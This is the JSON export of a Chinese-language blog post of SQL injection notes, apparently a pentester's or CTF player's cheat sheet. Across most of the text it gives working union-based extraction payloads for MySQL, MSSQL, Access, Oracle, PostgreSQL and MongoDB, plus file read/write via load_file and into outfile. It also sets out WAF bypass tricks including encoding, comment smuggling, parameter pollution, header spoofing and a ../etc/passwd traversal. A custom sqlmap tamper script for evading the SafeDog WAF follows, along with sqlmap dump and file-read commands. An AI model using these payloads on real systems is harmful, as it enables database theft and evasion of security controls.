{"id":10,"date":"2026-03-28T18:00:26","date_gmt":"2026-03-28T10:00:26","guid":{"rendered":"https:\/\/pumpk1n.icu\/?p=10"},"modified":"2026-05-09T11:16:12","modified_gmt":"2026-05-09T03:16:12","slug":"sql%e6%b3%a8%e5%85%a5","status":"publish","type":"post","link":"https:\/\/pumpk1n.icu\/index.php\/2026\/03\/28\/sql%e6%b3%a8%e5%85%a5\/","title":{"rendered":"SQL\u6ce8\u5165"},"content":{"rendered":"<h1>\u5224\u65ad\u6570\u636e\u5e93\u7c7b\u578b<\/h1>\n<pre><code>https:\/\/blog.csdn.net\/weixin_43749601\/article\/details\/115369123<\/code><\/pre>\n<h1>MYSQL\u6ce8\u5165<\/h1>\n<h2>\u57fa\u672c\u8bed\u53e5<\/h2>\n<h3>\u5224\u65ad\u6ce8\u5165\u70b9<\/h3>\n<p>\u8001\u65b9\u6cd5\uff1a\nand 1 = 1 \u9875\u9762\u6b63\u5e38\nand 1 = 2 \u9875\u9762\u9519\u8bef\n\u53ef\u80fd\u5b58\u5728\u6ce8\u5165\u70b9<\/p>\n<p>1.\u660e\u786e\u53c2\u6570\u7c7b\u578b<\/p>\n<ul>\n<li>\u6570\u5b57\uff0c\u5b57\u7b26\uff0c\u641c\u7d22\uff0cJOSN\u7b49<\/li>\n<\/ul>\n<p>2.\u660e\u786e\u8bf7\u6c42\u65b9\u6cd5<\/p>\n<ul>\n<li><code>$_GET<\/code>       \u4f7f\u7528get\u8bf7\u6c42\u53c2\u6570<\/li>\n<li><code>$_POST<\/code>     \u4f7f\u7528post\u8bf7\u6c42\u53c2\u6570<\/li>\n<li><code>$_COOKIE<\/code>  \u4f7f\u7528cookie\u8bf7\u6c42\u53c2\u6570<\/li>\n<li><code>$_REQUEST<\/code>\u4efb\u4f55\u65b9\u5f0f\u90fd\u53ef\u4ee5\u4f20\u5165\u53c2\u6570<\/li>\n<li><code>$_SERVER<\/code>  \u901a\u8fc7\u4f20\u5165HTTP\u5934\u53c2\u6570\u83b7\u53d6\u4fe1\u606f\uff08\u53ea\u9002\u7528\u4e8ephp\uff09<\/li>\n<\/ul>\n<p>SQL\u8bed\u53e5\u5e72\u6270\u7b26\u53f7<code>&#039;,&quot;,%,),}<\/code>\u7b49<\/p>\n<h3>\u5224\u65ad\u6ce8\u5165\u884c\u6570<\/h3>\n<p>?id=1 order by 1\n?id=1 order by 2\n?id=1 order by 
x<\/p>\n<h3>\u4fe1\u606f\u6536\u96c6<\/h3>\n<p>\u6570\u636e\u5e93\u7248\u672c\uff1aversion()\n\u6570\u636e\u5e93\u540d\u5b57\uff1adatabase()\n\u6570\u636e\u5e93\u7528\u6237\uff1auser()\n\u64cd\u4f5c\u7cfb\u7edf\uff1a@@version_compile_os<\/p>\n<h1>JSON\u6ce8\u5165<\/h1>\n<pre><code>{&quot;name&quot;:&quot;111&quot;,&quot;passwd&quot;:&quot;111&quot;}\n\u6ce8\u5165\n{&quot;name&quot;:&quot;111&#039; and 1=1#&quot;}<\/code><\/pre>\n<h4>\u7206\u5e93<\/h4>\n<p>?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata<\/p>\n<h4>\u7206\u8868<\/h4>\n<p>?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='\u5df2\u77e5\u5e93\u540d'<\/p>\n<h4>\u7206\u5217<\/h4>\n<p>?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='\u5df2\u77e5\u8868\u540d'<\/p>\n<h4>\u83b7\u53d6\u6570\u636e<\/h4>\n<p>?id=-1 union select 1,2,group_concat(\u5df2\u77e5\u5b57\u6bb5\u540d,':',\u5df2\u77e5\u5b57\u6bb5\u540d) from \u5df2\u77e5\u8868\u540d<\/p>\n<h4>\u5c0f\u8d34\u58eb<\/h4>\n<p>\u5982\u679c\u9047\u5230\u4e0d\u540c\u6570\u636e\u5e93\u4e2d\u6709\u540c\u540d\u8868\u65f6\uff0c\u4f1a\u663e\u793a\u7b2c\u4e00\u4e2a\u521b\u5efa\u7684\u8868\uff0c\u6216\u5f53\u524d\u6570\u636e\u5e93\u4e2d\u7684\u8868\uff0c\u5982\u679c\u60f3\u8981\u67e5\u8be2\u7684\u8868\u5728\u4e0b\u9762\uff0c\u53ef\u4ee5\u540c\u65f6\u52a0\u4e0a\u6570\u636e\u5e93\u540d\u548c\u8868\u540d\nid=-1 union select group_concat(column_name),2 from information_schema.columns where table_schema=\"root\" and table_name=\"users\"<\/p>\n<h3>sql\u6ce8\u5165\u8bfb\u5199\u6587\u4ef6\uff08\u6ce8\u610f\u8def\u5f84\u7528\u201c\/\u201d\uff09<\/h3>\n<p>load_file()\uff1a\u8bfb\u53d6\u51fd\u6570\uff08\u9700\u8981 FILE \u6743\u9650\uff0c\u4e14\u53d7 secure_file_priv \u9650\u5236\uff09<\/p>\n<pre><code>select load_file(&#039;c:\/pm.txt&#039;)<\/code><\/pre>\n<p>into outfile\u6216into dumpfile\uff1a\u5199\u5165\u51fd\u6570\uff08\u540c\u6837\u9700\u8981 FILE \u6743\u9650\u548c\u53ef\u5199\u76ee\u5f55\uff0csecure_file_priv \u4e3a NULL \u65f6\u5b8c\u5168\u7981\u7528\uff09<\/p>\n<pre><code>select &#039;x&#039; into outfile 
&#039;d:\/pm.txt&#039;<\/code><\/pre>\n<h1>Access\u6ce8\u5165<\/h1>\n<p>access\u6570\u636e\u5e93<\/p>\n<ul>\n<li>\u8868\u540d -&gt; \u5217\u540d -&gt; \u6570\u636e\n\u5176\u4f59\u6570\u636e\u5e93<\/li>\n<li>\u6570\u636e\u5e93\u540d -&gt; \u8868\u540d -&gt; \u5217\u540d -&gt; \u6570\u636e<\/li>\n<\/ul>\n<p>access\u6ce8\u5165\u65f6\uff0c\u8868\u540d\u548c\u5217\u540d\u53ea\u80fd\u9760\u731c\n\u5982\u679c\u731c\u4e0d\u5230\u7684\u8bdd\uff1a\u89c1\u4e0b\u6587\u7684 Access \u504f\u79fb\u6ce8\u5165<\/p>\n<h1>MSSQL\u6ce8\u5165<\/h1>\n<h3>\u5224\u65ad\u662f\u4e0d\u662fMSSQL\u6570\u636e\u5e93<\/h3>\n<pre><code>?id=1 and (select count(*) from sysobjects)&gt;0 --<\/code><\/pre>\n<h3>\u5224\u65ad\u6ce8\u5165\u70b9<\/h3>\n<p>and 1 = 1\nand 1 = 2<\/p>\n<h3>\u5224\u65ad\u5b57\u6bb5\u6570<\/h3>\n<pre><code>?id=-1 union all select null,null,null,null<\/code><\/pre>\n<p>\u5927\u4f53\u4e0emysql\u6ce8\u5165\u76f8\u4f3c\n\u53ef\u4ee5\u53c2\u8003<\/p>\n<pre><code>https:\/\/www.cnblogs.com\/lxfweb\/p\/12675023.html<\/code><\/pre>\n<h1>PostgreSQL\u6ce8\u5165<\/h1>\n<p>\u57fa\u672c\u8bed\u53e5<\/p>\n<pre><code>\u83b7\u53d6\u6240\u6709\u7684\u6570\u636e\u5e93\nselect datname from pg_database;\n\n\u83b7\u53d6\u5f53\u524d\u6570\u636e\u5e93\u4e0b\u6240\u6709\u7684\u8868\nselect tablename from pg_tables where schemaname = &#039;public&#039;\n\u6216\nselect table_name from information_schema.tables where table_schema=&#039;public&#039;\n\n\u83b7\u53d6\u5f53\u524d\u8868\u7684\u5217\u540d\nselect column_name from information_schema.columns where table_name = &#039;products&#039;;\n\n\u83b7\u53d6\u5f53\u524d\u8868\u7684\u503c\nselect name from products\n<\/code><\/pre>\n<h1>Oracle\u6ce8\u5165<\/h1>\n<p>Oracle 
\u4f7f\u7528\u67e5\u8be2\u8bed\u53e5\u83b7\u53d6\u6570\u636e\u65f6\u9700\u8981\u8ddf\u4e0a\u8868\u540d\uff0c\u5728\u6ca1\u6709\u8868\u7684\u60c5\u51b5\u4e0b\u53ef\u4ee5\u4f7f\u7528dual\uff0cdual\u662fOracle\u7684\u4e00\u4e2a\u865a\u62df\u8868\uff0c\u7528\u6765\u6784\u6210select\u7684\u8bed\u6cd5\u89c4\u5219\uff0c\u4e14Oracle\u4fdd\u8bc1dual\u91cc\u6c38\u8fdc\u53ea\u6709\u4e00\u6761\u8bb0\u5f55\uff08union \u5404\u5217\u7684\u7c7b\u578b\u5fc5\u987b\u4e0e\u539f\u67e5\u8be2\u4e00\u81f4\uff0c\u53ef\u7528 null \u5360\u4f4d\uff09<\/p>\n<pre><code>union select 1,2 from dual<\/code><\/pre>\n<p>\u63a2\u6d4b\u5f53\u524d\u6570\u636e\u5e93\u7528\u6237<\/p>\n<pre><code>select user from dual;<\/code><\/pre>\n<p>\u83b7\u53d6\u7528\u6237\u6240\u62e5\u6709\u6743\u9650\u7684\u6570\u636e\u5e93<\/p>\n<pre><code>select distinct owner from all_tables<\/code><\/pre>\n<p>\u83b7\u53d6\u5f53\u524d\u6570\u636e\u5e93\u4e2d\u7684\u8868(\u7531\u4e8eOracle \u4e2d\u4f7f\u7528 Schema \u7684\u6982\u5ff5\u5c06\u6bcf\u4e2a\u7528\u6237\u7684\u6570\u636e\u8fdb\u884c\u5206\u79bb\uff0cSchema \u5176\u5b9e\u7c7b\u4f3c\u4e8e\u547d\u540d\u7a7a\u95f4\u3002\u9ed8\u8ba4\u60c5\u51b5\u4e0b\uff0cSchema \u7684\u540d\u79f0\u540c\u7528\u6237\u540d\u79f0\u76f8\u540c)<\/p>\n<pre><code>-- \u6240\u6709\u7528\u6237\u7684\u8868\nselect distinct table_name from all_tables where owner = &#039;SYSTEM&#039;\n-- \u5f53\u524d\u7528\u6237\u7684\u8868\nselect table_name from user_tables;\n-- \u5305\u62ec\u7cfb\u7edf\u8868\nselect table_name from dba_tables where owner = &#039;SYSTEM&#039;;<\/code><\/pre>\n<p>\u83b7\u53d6\u5f53\u524dSYSTEM\u6570\u636e\u5e93\u4e2d\u8868USER\u8868\u7684\u5b57\u6bb5<\/p>\n<pre><code>select table_name from all_tables where owner=&#039;SYSTEM&#039; and table_name like &#039;USER%&#039;\n(\u4f7f\u7528like\u662f\u5305\u542b\u8868\u540d\u5305\u542bUSER\u7684\u8868\uff0c\u4e0d\u662f\u7b49\u4e8eUSER\u7684\u8868)\nselect column_name from all_tab_columns where table_name =&#039;USERS_KVHXKJ&#039;<\/code><\/pre>\n<p>\u83b7\u53d6\u503c<\/p>\n<pre><code>select USERNAME_ETSGGX,PASSWORD_OEDQBQ from 
USERS_KVHXKJ<\/code><\/pre>\n<h1>MongoDB\u6ce8\u5165\uff08\u670d\u52a1\u7aef JavaScript \u6ce8\u5165\uff09<\/h1>\n<p>\u83b7\u53d6\u6240\u6709\u5b57\u6bb5\u540d<\/p>\n<pre><code>id=1&#039;}); return Object.keys(this); var dummy=&#039;<\/code><\/pre>\n<p>\u67e5\u8be2\u56de\u663e\u4f4d\u7f6e<\/p>\n<pre><code>id=1&#039;});return ({&#039;title&#039;:&#039;1&#039;,&#039;content&#039;:&#039;2<\/code><\/pre>\n<p>\u67e5\u8be2\u6570\u636e\u5e93\u540d\u79f0<\/p>\n<pre><code>id=1&#039;});return ({&#039;title&#039;:tojson(db),&#039;content&#039;:&#039;2<\/code><\/pre>\n<p>\u67e5\u8be2\u8868\u540d\u79f0<\/p>\n<ul>\n<li><code>getCollectionNames()<\/code>\uff1a\u8fd4\u56de\u6240\u6709\u96c6\u5408\u540d\u79f0\u6570\u7ec4\n<pre><code>id=1&#039;});return ({&#039;title&#039;:tojson(db.getCollectionNames()),&#039;content&#039;:&#039;2<\/code><\/pre><\/li>\n<\/ul>\n<p>\u67e5\u8be2\u5b57\u6bb5\u7ed3\u6784<\/p>\n<ul>\n<li><code>Authority_confidential<\/code>\uff1a\u76ee\u6807\u96c6\u5408\u540d<\/li>\n<li><code>find()[0]<\/code>\uff1a\u83b7\u53d6\u96c6\u5408\u7b2c\u4e00\u6761\u8bb0\u5f55<\/li>\n<li><code>find()[1]<\/code>\uff1a\u83b7\u53d6\u96c6\u5408\u7b2c\u4e8c\u6761\u8bb0\u5f55\n<pre><code>id=1&#039;});return ({&#039;title&#039;:tojson(db.Authority_confidential.find()[0]),&#039;content&#039;:&#039;2<\/code><\/pre><\/li>\n<\/ul>\n<h1>Access\u504f\u79fb\u6ce8\u5165<\/h1>\n<p>access\u6570\u636e\u5e93\u6ca1\u6709\u7c7b\u4f3c\u4e8emysql\u7684information_schema\u8fd9\u6837\u7684\u7cfb\u7edf\u7d22\u5f15\u5e93\uff0c\u6240\u4ee5\u6211\u4eec\u53ea\u80fd\u6839\u636e\u7ecf\u9a8c\u9760\u731c\u4e86<\/p>\n<pre><code>?id=1513 and exists(select * from admin)<\/code><\/pre>\n<p>\u786e\u5b9a\u76ee\u6807\u8868\u7684\u5b57\u6bb5\u6570\u91cf<\/p>\n<pre><code>?id=1513 and exists(select * from admin order by 6)<\/code><\/pre>\n<p>\u504f\u79fb\u6ce8\u5165\u7684\u57fa\u672c\u516c\u5f0f<\/p>\n<ul>\n<li>\u8054\u5408\u67e5\u8be2\u6240\u8981\u8865\u5145\u7684\u5b57\u6bb5\u6570 = \u5f53\u524d\u5b57\u6bb5\u6570\u91cf - \u76ee\u6807\u8868\u7684\u5b57\u6bb5\u6570 x 
N<\/li>\n<\/ul>\n<p>\u4e00\u7ea7\u6ce8\u5165<\/p>\n<pre><code>?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, * from admin<\/code><\/pre>\n<p>\u4e8c\u7ea7\u6ce8\u5165<\/p>\n<pre><code>?id=1513 union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)<\/code><\/pre>\n<h1>\u4f7f\u7528sqlmap<\/h1>\n<h2>\u57fa\u672c\u8bed\u6cd5<\/h2>\n<pre><code>python sqlmap.py -r \u6293\u5305\u6587\u4ef6 --batch --file-read &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/\/filename&quot; --tamper &quot;space2comment&quot; <\/code><\/pre>\n<p>\u7136\u540e\u53bb\u7ed3\u679c\u6587\u4ef6\u4e2d\u627e\u7b54\u6848<\/p>\n<h3>sqlmap\u8131\u5e93<\/h3>\n<pre><code>python sqlmap.py -r \u6293\u5305\u6587\u4ef6 --dump<\/code><\/pre>\n<p>\u6216\u8005\u4f7f\u7528sqlmap\u57fa\u7840\u7206\u7834\u65b9\u6cd5<a href=\"sqlmap\" target=\"_blank\"  rel=\"nofollow\" >sqlmap<\/a>  <\/p>\n<h3>waf\u7ed5\u8fc7sql\u6ce8\u5165<\/h3>\n<p>\u6570\u636e<\/p>\n<ul>\n<li>\u5927\u5c0f\u5199\n<pre><code>id=-1 uNIoN sELecT 1,2,3#<\/code><\/pre><\/li>\n<li>\u52a0\u5bc6\u89e3\u5bc6<\/li>\n<li>\u7f16\u7801\u89e3\u7801\n<pre><code>id=-1%252f%252a*\/UNION%252f%252a \/SELECT<\/code><\/pre><\/li>\n<li>\u7b49\u4ef7\u51fd\u6570<\/li>\n<li>\u7279\u6b8a\u7b26\u53f7<\/li>\n<li>\u53cd\u5e8f\u5217\u5316<\/li>\n<li>\u6ce8\u91ca\u7b26\u6df7\u7528\n<pre><code>id=-1 union select 1,2,3#\nid=-1 union%23a%20select 1,2,3#    %23\u662f#,a\u7528\u6765\u622a\u65ad\u5339\u914d,%20\u6362\u884c\u7b26<\/code><\/pre><\/li>\n<li>\u5185\u8054\u6ce8\u91ca\n<pre><code>\/*!xxxxxx*\/ 
\u8fdb\u884c\u6ce8\u5165\u65f6mysql\u4f1a\u628a!\u540e\u9762\u7684\u5f53\u4f5csql\u8bed\u53e5\u76f4\u63a5\u6267\u884c\n\u6ce8\u610f\uff1a\u5728!\u540e\u9762\u52a0\u4e0a\u7248\u672c\u53f7\n\u5f53!\u540e\u9762\u63a5\u7684\u6570\u636e\u5e93\u7248\u672c\u53f7\u5c0f\u4e8e\u6216\u7b49\u4e8e\u81ea\u8eab\u7248\u672c\u53f7\uff0c\u5c31\u4f1a\u5c06\u6ce8\u91ca\u4e2d\u7684\u5185\u5bb9\u6267\u884c\n\u5f53!\u540e\u9762\u63a5\u7684\u6570\u636e\u5e93\u7248\u672c\u53f7\u5927\u4e8e\u81ea\u8eab\u7248\u672c\u53f7\uff0c\u5c31\u4f1a\u5f53\u4f5c\u6ce8\u91ca\u6765\u5904\u7406<\/code><\/pre>\n<p>\u65b9\u5f0f<\/p><\/li>\n<li>\u66f4\u6539\u63d0\u4ea4\u65b9\u5f0f<\/li>\n<li>\u53d8\u5f02\n\u5176\u4ed6<\/li>\n<li>Fuzz\u5927\u6cd5\n<pre><code>\u8fd9\u4e0d\u662f\u4e00\u4e2a\u5de5\u5177\uff0c\u8fd9\u662f\u4e00\u79cd\u601d\u60f3\uff0c\u7c7b\u4f3c\u4e8e\u7206\u7834\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u7f16\u5199\u5b57\u5178\uff0c\u7136\u540e\u66ff\u6362\u6ce8\u91ca\u7b26\u8fdb\u884c\u7ed5\u8fc7<\/code><\/pre><\/li>\n<li>\u6570\u636e\u5e93\u7279\u6027<\/li>\n<li>\u5783\u573e\u6570\u636e\u6ea2\u51fa<\/li>\n<li>HTTP\u53c2\u6570\u6c61\u67d3\n<pre><code>id=-1 union select 1,2,3#\nid=1\/**&amp;id=-1%20union%20select%201,2,3%23*\/\n\u5b89\u5168\u72d7\u6536\u5230\u4e24\u4e2a\u53c2\u6570 1 \/**-1%20union%20select%201,2,3%23*\/  \u540e\u9762\u6ce8\u91ca\u7ed5\u8fc7\n\u4f46\u662f\u6570\u636e\u5e93\u4f1a\u6267\u884c\u540e\u9762\u90a3\u4e2a -1%20union%20select%201,2,3%23<\/code><\/pre><\/li>\n<\/ul>\n<p><strong>\u65b9\u5f0f\u4e00:IP\u767d\u540d\u5355<\/strong>\n\u4ece\u7f51\u7edc\u5c42\u83b7\u53d6\u7684ip\uff0c\u8fd9\u79cd\u4e00\u822c\u4f2a\u9020\u4e0d\u6765\uff0c\u5982\u679c\u662f\u4ece HTTP \u5934\u83b7\u53d6\u5ba2\u6237\u7aef\u7684IP\uff0c\u8fd9\u6837\u5c31\u53ef\u80fd\u5b58\u5728\u4f2a\u9020Ip\u7ed5\u8fc7\u7684\u60c5\u51b5\u3002\n\u6d4b\u8bd5\u65b9\u6cd5:\u4fee\u6539HTTP\u7684header\u6765bypass 
waf<\/p>\n<pre><code>x-forwarded-for\nx-remote-IP\nx-originating-IP\nx-remote-addr\nx-Real-ip<\/code><\/pre>\n<p><strong>\u65b9\u5f0f\u4e8c:\u9759\u6001\u8d44\u6e90<\/strong>\n\u7279\u5b9a\u7684\u9759\u6001\u8d44\u6e90\u540e\u7f00\u8bf7\u6c42\uff0c\u5e38\u89c1\u7684\u9759\u6001\u6587\u4ef6(.js .jpg .swf .css\u7b49\u7b49)\uff0c\u7c7b\u4f3c\u767d\u540d\u5355\u673a\u5236,waf\u4e3a\u4e86\u68c0\u6d4b\u6548\u7387\uff0c\u4e0d\u53bb\u68c0\u6d4b\u8fd9\u6837\u4e00\u4e9b\u9759\u6001\u6587\u4ef6\u540d\u540e\u7f00\u7684\u8bf7\u6c42\u3002<\/p>\n<pre><code>http:\/\/10.9.9.201\/sql.php?id=1\nhttp:\/\/10.9.9.201\/sql.php\/1.js?id=1<\/code><\/pre>\n<p>\u5907\u6ce8: aspx\/php\u53ea\u8bc6\u522b\u5230\u524d\u9762\u7684.aspx\/ .php\u540e\u9762\u57fa\u672c\u4e0d\u8bc6\u522b<\/p>\n<p><strong>\u65b9\u5f0f\u4e09:url\u767d\u540d\u5355<\/strong>\n\u4e3a\u4e86\u9632\u6b62\u8bef\u62e6\uff0c\u90e8\u5206waf\u5185\u7f6e\u9ed8\u8ba4\u7684\u767d\u540d\u5355\u5217\u8868\uff0c\u5982admin\/manager\/system\u7b49\u7ba1\u7406\u540e\u53f0\u3002\u53ea\u8981url\u4e2d\u5b58\u5728\u767d\u540d\u5355\u7684\u5b57\u7b26\u4e32\uff0c\u5c31\u4f5c\u4e3a\u767d\u540d\u5355\u4e0d\u8fdb\u884c\u68c0\u6d4b\u3002\u5e38\u89c1\u7684url\u6784\u9020\u59ff\u52bf:<\/p>\n<pre><code>http:\/\/10.9.9.201\/sql.php\/admin.php?id=1\nhttp:\/\/10.9.9.201\/sql.php?a=\/manage\/&amp;b=..\/etc\/passwd\nhttp:\/\/10.9.9.201\/..\/..\/..\/manage\/..\/sql.asp?id=2<\/code><\/pre>\n<p>waf\u901a\u8fc7\/manage\/\u8fdb\u884c\u6bd4\u8f83\uff0c\u53ea\u8981uri\u4e2d\u5b58\u5728\/manage\/\u5c31\u4f5c\u4e3a\u767d\u540d\u5355\u4e0d\u8fdb\u884c\u68c0\u6d4b\uff0c\u8fd9\u6837\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\/sql.php?a=\/ 
manage\/&amp;b=..\/etc\/passwd\u7ed5\u8fc7\u9632\u5fa1\u89c4\u5219\u3002<\/p>\n<h3>sqlmap\u7ed5\u8fc7waf<\/h3>\n<p>\u4f7f\u7528sqlmap\u7684tamper\u811a\u672c\u8fdb\u884c\u7ed5\u8fc7\n\u4f46\u662f\u81ea\u5e26\u7684\u811a\u672c\u53ea\u80fd\u7ed5\u8fc7ctf\u6bd4\u8d5b\u90a3\u79cd\u9898\u76ee\uff0c\u5b9e\u6218\u4e2d\u9700\u8981\u81ea\u5df1\u7f16\u5199<\/p>\n<p>sqlmap\u7ed5\u8fc7\u5b89\u5168\u72d7\n\u9996\u5148\u7f16\u5199bypassdog.py\u6587\u4ef6\uff08\u653e\u5230 sqlmap \u7684 tamper \u76ee\u5f55\u4e0b\uff09<\/p>\n<pre><code>#!\/usr\/bin\/env python\n\nimport re\n\nfrom lib.core.settings import UNICODE_ENCODING\nfrom lib.core.enums import PRIORITY\n__priority__ = PRIORITY.NORMAL\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    if payload:\n        payload = payload.replace(&quot; &quot;,&quot;\/*\/!%!\/*\/&quot;)\n        payload = payload.replace(&quot;()&quot;,&quot;(\/*\/!%!\/*\/)&quot;)\n        payload = re.sub(r&quot;(?i)(INFORMATION_SCHEMA.SCHEMATA)&quot;,r&quot;\/*!00000--%20\/*%\/%0aINFORMATION_SCHEMA.SCHEMATA*\/&quot;,payload)\n        payload = re.sub(r&quot;(?i)(INFORMATION_SCHEMA.TABLES)&quot;,r&quot;\/*!00000--%20\/*%\/%0aINFORMATION_SCHEMA.TABLES*\/&quot;,payload)\n        payload = re.sub(r&quot;(?i)(INFORMATION_SCHEMA.COLUMNS)&quot;,r&quot;\/*!00000--%20\/*%\/%0aINFORMATION_SCHEMA.COLUMNS*\/&quot;,payload)\n        payload = re.sub(r&quot;(?i)(\/AS\/)&quot;,r&quot;\/\/*!00000--%20\/*%\/%0aAS*\/\/&quot;,payload)        \n\n    return payload<\/code><\/pre>\n<p>\u5176\u5b9e\u5c31\u662f\u6839\u636e\u524d\u9762\u7684\u624b\u6ce8\u6765\u4fee\u6539payload<\/p>\n<p>\u7136\u540e\u4f7f\u7528sqlmap<\/p>\n<pre><code>sqlmap.py -u &quot;http:\/\/192.168.13.131\/sqli-labs\/Less-2\/?id=1&quot; --tamper &quot;bypassdog.py&quot; --proxy &quot;http:\/\/127.0.0.1:8080\/&quot; --random-agent<\/code><\/pre>\n<ul>\n<li>--tamper \"bypassdog.py\"  \u4f7f\u7528\u7684\u811a\u672c<\/li>\n<li><code>--proxy &quot;http:\/\/127.0.0.1:8080\/&quot;<\/code>  
\u6302\u4ee3\u7406\uff0c\u4f7f\u7528 Burp Suite \u67e5\u770b\u7206\u7834\u60c5\u51b5<\/li>\n<li>--random-agent   \u4f7f\u7528\u968f\u673a User-Agent\uff0csqlmap \u9ed8\u8ba4\u7684 User-Agent \u4f1a\u88ab\u68c0\u6d4b\u5230<\/li>\n<\/ul>\n<p>\u5982\u679c\u5bf9\u65b9\u5f00\u542f\u4e86\u6d41\u91cf\u63a7\u5236\uff0c\u90a3\u4e48\u6211\u4eec\u4f7f\u7528sqlmap\u7206\u7834\u65f6\uff0c\u4f1a\u56e0\u4e3a\u901f\u5ea6\u592a\u5feb\uff0c\u5c01\u7981\u6211\u4eec\u7684ip<\/p>\n<p>1.\u53ef\u4ee5\u4f7f\u7528\u6d4f\u89c8\u5668\u6216\u722c\u866b\u7684 User-Agent<\/p>\n<pre><code>sqlmap.py -u &quot;http:\/\/192.168.13.131\/sqli-labs\/Less-2\/?id=1&quot; --tamper &quot;bypassdog.py&quot; --proxy &quot;http:\/\/127.0.0.1:8080\/&quot; --user-agent=&quot;Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/64.0.3282.140 Safari\/537.36 Edge\/18.17763&quot;<\/code><\/pre>\n<ul>\n<li>--user-agent=  \u81ea\u5b9a\u4e49 User-Agent\uff08\u793a\u4f8b\u662f\u684c\u9762\u6d4f\u89c8\u5668\u7684 UA\uff1b\u82e5\u8981\u4f2a\u88c5\u6210\u641c\u7d22\u5f15\u64ce\u722c\u866b\uff0c\u9700\u6539\u7528\u722c\u866b\u7684 UA\uff09<\/li>\n<\/ul>\n<p>2.\u53ef\u4ee5\u4f7f\u7528\u5ef6\u8fdf\u6ce8\u5165<\/p>\n<pre><code>sqlmap.py -u &quot;http:\/\/192.168.13.131\/sqli-labs\/Less-2\/?id=1&quot; --tamper &quot;bypassdog.py&quot; --proxy &quot;http:\/\/127.0.0.1:8080\/&quot; --random-agent --delay 1\n\u6216\u8005\nsqlmap.py -u &quot;http:\/\/192.168.13.131\/sqli-labs\/Less-2\/?id=1&quot; --tamper &quot;bypassdog.py&quot; --proxy &quot;http:\/\/127.0.0.1:8080\/&quot; --random-agent --safe-freq 3<\/code><\/pre>\n<ul>\n<li>--delay 1  \u6bcf\u6b21\u8bf7\u6c42\u4e4b\u95f4\u5ef6\u8fdf 1 \u79d2<\/li>\n<li>--safe-freq 3  \u6bcf\u53d1 3 \u4e2a\u6d4b\u8bd5\u8bf7\u6c42\u540e\u8bbf\u95ee\u4e00\u6b21\u5b89\u5168 URL\uff08\u9700\u914d\u5408 --safe-url \u4f7f\u7528\uff09<\/li>\n<\/ul>\n<p>3.\u672c\u5730\u811a\u672c\nsqlmap\u53bb\u6ce8\u5165\u672c\u5730\u811a\u672c -&gt; \u672c\u5730\u642d\u5efa\u811a\u672c\uff08\u8bf7\u6c42\u6570\u636e\u5305\u81ea\u5b9a\u4e49\u7f16\u5199\uff09-&gt; \u8fdc\u7a0b\u5730\u5740\n(\u4e0d\u592a\u4f1a\u7528)<\/p>\n<pre><code>&lt;?php\n$data = array(&#039;foo&#039; =&gt; &#039;bar&#039;);\n$data = http_build_query($data);\n$opts = array(&#039;http&#039; =&gt; array(&#039;method&#039; =&gt; &#039;POST&#039;, 
&#039;header&#039; =&gt; &#039;Content-type: application\/x-www-form-urlencodedrn&#039; . &#039;Content-Length: &#039; . strlen($data) . &#039;\\r\\n&#039;, &#039;content&#039; =&gt; $data));\n$context = stream_context_create($opts);\n$html = file_get_contents(&#039;https:\/\/wenda.shukaming.com&#039;, false, $context);\necho $html;\n?&gt;<\/code><\/pre>","protected":false},"excerpt":{"rendered":"<p>\u5224\u65ad\u6570\u636e\u5e93\u7c7b\u578b <a href=\"https:\/\/blog.csdn.net\/weixin_43749601\/article\/details\/115\">https:\/\/blog.csdn.net\/weixin_43","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[6,7],"tags":[],"class_list":["post-10","post","type-post","status-publish","format-standard","hentry","category-owasp","category-sql"],"_links":{"self":[{"href":"https:\/\/pumpk1n.icu\/index.php\/wp-json\/wp\/v2\/posts\/10","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/pumpk1n.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/pumpk1n.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/pumpk1n.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/pumpk1n.icu\/index.php\/wp-json\/wp\/v2\/comments?post=10"}],"version-history":[{"count":7,"href":"https:\/\/pumpk1n.icu\/index.php\/wp-json\/wp\/v2\/posts\/10\/revisions"}],"predecessor-version":[{"id":39,"href":"https:\/\/pumpk1n.icu\/index.php\/wp-json\/wp\/v2\/posts\/10\/revisions\/39"}],"wp:attachment":[{"href":"https:\/\/pumpk1n.icu\/index.php\/wp-json\/wp\/v2\/media?parent=10"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/pumpk1n.icu\/index.php\/wp-json\/wp\/v2\/categories?post=10"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/pumpk1n.icu\/index.php\/wp-json\/wp\/v2\/tags?
post=10"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}